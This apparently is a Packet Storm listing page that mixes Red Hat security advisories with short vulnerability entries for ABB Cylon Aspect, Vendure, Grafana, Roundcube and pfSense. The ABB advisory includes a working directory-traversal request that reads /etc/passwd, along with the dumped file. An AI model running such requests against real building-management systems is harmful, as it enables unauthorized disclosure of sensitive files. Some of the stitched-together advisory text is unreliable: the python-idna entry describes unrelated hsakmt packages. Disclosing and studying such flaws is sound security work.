Red Hat Security Advisory 2024-8260-03 - Red Hat OpenShift Container Platform release 4.16.18 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8260.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.16.18 bug fix and security update  
Advisory ID:        RHSA-2024:8260-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8260  
Issue date:         2024-10-24  
Revision:           03  
CVE Names:          CVE-2024-3727  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.16.18 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.16.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.16.18. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:8263

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.16/release_notes/ocp-4-16-release-notes.html

Security Fix(es):

* encoding/gob: golang: Calling Decoder.Decode on a message which contains  
deeply nested structures can cause a panic due to stack exhaustion  
(CVE-2024-34156)  
* containers/image: digest type does not guarantee valid type  
(CVE-2024-3727)  
* net/http: Denial of service due to improper 100-continue handling in  
net/http (CVE-2024-24791)  
* jose-go: improper handling of highly compressed data (CVE-2024-28180)  
* go/parser: golang: Calling any of the Parse functions containing deeply  
nested literals can cause a panic/stack exhaustion (CVE-2024-34155)  
* go/build/constraint: golang: Calling Parse on a \"// +build\" build tag  
line with deeply nested expressions can cause a panic due to stack  
exhaustion (CVE-2024-34158)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.16 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.16/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2024-3727

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2268854  
https://bugzilla.redhat.com/show_bug.cgi?id=2274767  
https://bugzilla.redhat.com/show_bug.cgi?id=2295310  
https://bugzilla.redhat.com/show_bug.cgi?id=2310527  
https://bugzilla.redhat.com/show_bug.cgi?id=2310528  
https://bugzilla.redhat.com/show_bug.cgi?id=2310529  
https://issues.redhat.com/browse/OCPBUGS-33692  
https://issues.redhat.com/browse/OCPBUGS-33693  
https://issues.redhat.com/browse/OCPBUGS-39415  
https://issues.redhat.com/browse/OCPBUGS-41364  
https://issues.redhat.com/browse/OCPBUGS-41805  
https://issues.redhat.com/browse/OCPBUGS-41904  
https://issues.redhat.com/browse/OCPBUGS-42014  
https://issues.redhat.com/browse/OCPBUGS-42369  
https://issues.redhat.com/browse/OCPBUGS-42420  
https://issues.redhat.com/browse/OCPBUGS-42432  
https://issues.redhat.com/browse/OCPBUGS-42724  
https://issues.redhat.com/browse/OCPBUGS-42933  
https://issues.redhat.com/browse/OCPBUGS-43056  
https://issues.redhat.com/browse/OCPBUGS-43063  
https://issues.redhat.com/browse/OCPBUGS-43104  
https://issues.redhat.com/browse/OCPBUGS-43105  
https://issues.redhat.com/browse/OCPBUGS-43308  
https://issues.redhat.com/browse/OCPBUGS-43433  
https://issues.redhat.com/browse/OCPBUGS-43467

Red Hat Security Advisory 2024-8260-03

ABB Cylon Aspect version 3.08.02 suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the logFile GET parameter via the logYumLookup.php script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

ABB Cylon Aspect 3.08.02 (logYumLookup.php) Authenticated File Disclosure

Vendor: ABB Ltd. 
Product web page: https://www.global.abb 
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio 
 Firmware: 3.08.02

Summary: ASPECT is an award-winning scalable building energy management 
and control solution designed to allow users seamless access to their 
building data through standard building protocols including smart devices.

Desc: The building management system suffers from an authenticated arbitrary 
file disclosure vulnerability. Input passed through the 'logFile' GET parameter 
via the 'logYumLookup.php' script is not properly verified before being used 
to download log files. This can be exploited to disclose the contents of arbitrary 
and sensitive files via directory traversal attacks.

Tested on: GNU/Linux 3.15.10 (armv7l) 
 GNU/Linux 3.10.0 (x86_64) 
 GNU/Linux 2.6.32 (x86_64) 
 Intel(R) Atom(TM) Processor E3930 @ 1.30GHz 
 Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz 
 PHP/7.3.11 
 PHP/5.6.30 
 PHP/5.4.16 
 PHP/4.4.8 
 PHP/5.3.3 
 AspectFT Automation Application Server 
 lighttpd/1.4.32 
 lighttpd/1.4.18 
 Apache/2.2.15 (CentOS) 
 OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) 
 OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic 
 @zeroscience

Advisory ID: ZSL-2024-5849 
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5849.php

21.04.2024

--

$ cat project

 P R O J E C T

 .| 
 | | 
 |'| ._____ 
 ___ | | |. |' .---"| 
 _ .-' '-. | | .--'| || | _| | 
 .-'| _.| | || '-__ | | | || | 
 |' | |. | || | | | | || | 
 ____| '-' ' "" '-' '-.' '` |____ 
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
 ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
 ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
 ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
 ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ 
 ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
 ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
 ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 

 $ curl "http://192.168.73.31/logYumLookup.php?logFile=/etc/passwd" -H "Cookie: PHPSESSID=xxx" 
aamtech:x:500:500::/home/aamtech:/bin/sh 
mysql:x:993:65534::/var/mysql: 
ppp:x:994:65534::/dev/null:/usr/sbin/ppp-dialin 
xuser:x:1000:1000::/home/xuser: 
sshd:x:995:992::/var/run/sshd:/bin/false 
avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false 
avahi:x:997:994::/var/run/avahi-daemon:/bin/false 
systemd-journal-gateway:x:998:995::/home/systemd-journal-gateway: 
messagebus:x:999:998::/var/lib/dbus:/bin/false 
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh 
irc:x:39:39:ircd:/var/run/ircd:/bin/sh 
list:x:38:38:Mailing List Manager:/var/list:/bin/sh 
backup:x:34:34:backup:/var/backups:/bin/sh 
www-data:x:33:33:www-data:/var/www:/bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh 
games:x:5:60:games:/usr/games:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
sys:x:3:3:sys:/dev:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
root:x:0:0:root:/home/root:/bin/sh

ABB Cylon Aspect 3.08.02 logYumLookup.php Authenticated File Disclosure

Vendure is an open-source headless commerce platform. Prior to versions 3.0.5 and 2.3.3, a vulnerability in Vendure's asset server plugin allows an attacker to craft a request which is able to traverse the server file system and retrieve the contents of arbitrary files, including sensitive data such as configuration files, environment variables, and other critical data stored on the server. In the same code path is an additional vector for crashing the server via a malformed URI. Patches are available in versions 3.0.5 and 2.3.3. Some workarounds are also available. One may use object storage rather than the local file system, e.g. MinIO or S3, or define middleware which detects and blocks requests with urls containing /../.

Vendure Arbitrary File Read / Denial Of Service

Helakuru version 1.1 suffers from a dll hijacking vulnerability.

Helakuru 1.1 DLL Hijacking

This repository contains a Python script that exploits a remote code execution vulnerability in Grafana's SQL Expressions feature. By leveraging insufficient input sanitization, this exploit allows an attacker to execute arbitrary shell commands on the server. This is made possible through the shellfs community extension, which can be installed and loaded by an attacker to facilitate command execution.

Grafana Remote Code Execution

Roundcube Webmail versions prior to 1.5.7 and 1.6.x prior to 1.6.7 allows cross site scripting via SVG animate attributes.

Roundcube Webmail Cross Site Scripting

A cross site scripting vulnerability in pfsense version 2.5.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the $pconfig variable at interfaces_groups_edit.php.

pfSense 2.5.2 Cross Site Scripting

Red Hat Security Advisory 2024-8374-03 - An update for python3.11 is now available for Red Hat Enterprise Linux 9.4 Extended Update Support.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8374.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: python3.11 security updateAdvisory ID:        RHSA-2024:8374-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8374Issue date:         2024-10-23Revision:           03CVE Names:          CVE-2024-6232====================================================================Summary: An update for python3.11 is now available for Red Hat Enterprise Linux 9.4 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: cpython: tarfile: ReDos via excessive backtracking while parsing header values (CVE-2024-6232)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6232References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2309426

Red Hat Security Advisory 2024-8374-03

Red Hat Security Advisory 2024-8365-03 - An update for python-idna is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8365.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: python-idna security updateAdvisory ID:        RHSA-2024:8365-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8365Issue date:         2024-10-23Revision:           03CVE Names:          CVE-2024-3651====================================================================Summary: An update for python-idna is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The hsakmt packages include a thunk library for AMD's Heterogeneous System Architecture (HSA) Linux kernel driver (amdkfd).Security Fix(es):* python-idna: potential DoS via resource consumption via specially crafted inputs to idna.encode() (CVE-2024-3651)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-3651References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2274779

Red Hat Security Advisory 2024-8365-03

Red Hat Security Advisory 2024-8238-03 - Red Hat OpenShift Container Platform release 4.14.39 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8238.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.14.39 security update  
Advisory ID:        RHSA-2024:8238-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8238  
Issue date:         2024-10-23  
Revision:           03  
CVE Names:          CVE-2024-9341  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.14.39 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.14.

Red Hat Product Security has rated this update as having a security impact of  Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.14.39. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2024:8235

Security Fix(es):

* Podman: Buildah: cri-o: FIPS Crypto-Policy Directory Mounting Issue in  
containers/common Go Library (CVE-2024-9341)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.14 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.14/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.14/release_notes/ocp-4-14-release-notes.html

CVEs:

CVE-2024-9341

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2315691

Source

Packet Storm